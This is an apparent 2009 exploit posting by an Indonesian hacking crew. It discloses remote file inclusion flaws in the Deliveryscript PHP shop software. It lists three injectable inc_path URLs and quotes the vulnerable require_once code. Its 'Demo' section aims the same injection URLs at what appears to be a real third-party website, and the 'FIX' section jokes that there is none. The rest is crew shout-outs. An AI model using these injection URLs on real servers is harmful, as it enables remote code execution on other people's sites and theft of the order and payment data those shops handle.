Deliveryscript Multiple Remote File include vulnerability

############################################################################# ## Deliveryscript Multiple Remote File include vulnerability ## ## Author : kaMtiEz (kamzcrew@yahoo.com) ## ## Homepage : http://www.indonesiancoder.com ## ## Date : October 30, 2009 ## ############################################################################# [ Software Information ] [+] Vendor : http://www.deliveryscript.com/ [+] Download : - [+] version : v25 or lower [+] Price : - Unlimited = $199 - Professional = $99 - Standard = $39 [+] Vulnerability : RFI [+] Dork : Think It [+] Location : INDONESIA - JOGJA ############################################################################# [ Vulnerable File ] http://127.0.0.1/[PATH]/ds-inc/inc.php?inc_path=[INDONESIANCODER] http://127.0.0.1/[PATH]/ds-inc/functions.php?inc_path=[INDONESIANCODER] http://127.0.0.1/[PATH]/ds-inc/setups.php?inc_path=[INDONESIANCODER] [ BUG IN ] [+] inc.php require_once($inc_path . 'functions.php'); require_once($inc_path . 'setups.php'); [+] Functions.php require_once($inc_path . 'functions/admin/function.invalidate_admin.php'); require_once($inc_path . 'functions/admin/function.is_valid_admin.php'); require_once($inc_path . 'functions/admin/function.set_valid_admin.php'); require_once($inc_path . 'functions/sms/function.send_clickatell_sms.php'); require_once($inc_path . 'functions/util/function._decrypt.php'); require_once($inc_path . 'functions/util/function._encrypt.php'); require_once($inc_path . 'functions/util/function.filesize_format.php'); require_once($inc_path . 'functions/util/function.get_host.php'); require_once($inc_path . 'functions/util/function.get_uri.php'); require_once($inc_path . 'functions/util/function.get_user_ip.php'); require_once($inc_path . 'functions/function._array_unique.php'); require_once($inc_path . 'functions/function.block_link.php'); require_once($inc_path . 'functions/function.download_file_exists.php'); require_once($inc_path . 'functions/function.generate_auth.php'); require_once($inc_path . 'functions/function.get_product.php'); require_once($inc_path . 'functions/function.is_blocked.php'); require_once($inc_path . 'functions/function.is_valid_download_request.php'); require_once($inc_path . 'functions/function.is_valid_payment.php'); require_once($inc_path . 'functions/function.notify_idevaffiliate.php'); require_once($inc_path . 'functions/function.process_order.php'); require_once($inc_path . 'functions/function.product_exists.php'); require_once($inc_path . 'functions/function.resend_order_email.php'); require_once($inc_path . 'functions/function.returned_txn_id_exists.php'); require_once($inc_path . 'functions/function.sectostr.php'); require_once($inc_path . 'functions/function.send_echeck_delay_notice.php'); require_once($inc_path . 'functions/function.send_manual_process_notice.php'); require_once($inc_path . 'functions/function.send_order_email.php'); require_once($inc_path . 'functions/function.txn_id_exists.php'); [+] setups.php require_once($inc_path . 'setups/setup.phpmailer.php'); require_once($inc_path . 'setups/setup.phpxml.php'); [ Demo ] http://prkg.com/wallstreet/ds-inc/inc.php?inc_path=[kaMtiEz] http://prkg.com/wallstreet/ds-inc/functions.php?inc_path=[kaMtiEz] http://prkg.com/wallstreet/ds-inc/setups.php?inc_path=[kaMtiEz] [ FIX ] Dont know :P Joke ;) ############################################################################# [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW [+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h [+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz [+] Coracore,black666girl,NepT,ichal,tengik,Gh4mb4s,rendy and YOU!! [ NOTE ] [+] makasih buad babe and enyak ma ade .... muach .. [+] AuraKasih ada apa dengan mu ??? [+] For M3NW5 Woi lu di tunggu Om Don Tukulesto tuh !! Malah ngilang .. [+] For Don Tukulesto .. Nothing to say .. u are best ! [+] Buat Para IndonesianCoder dan kill-9 Member .. Tetap semangat !!! [+] Malam Minggu jam setengah 8 .. Mau ngapel malah nemu Vulnerability .. wkwkkw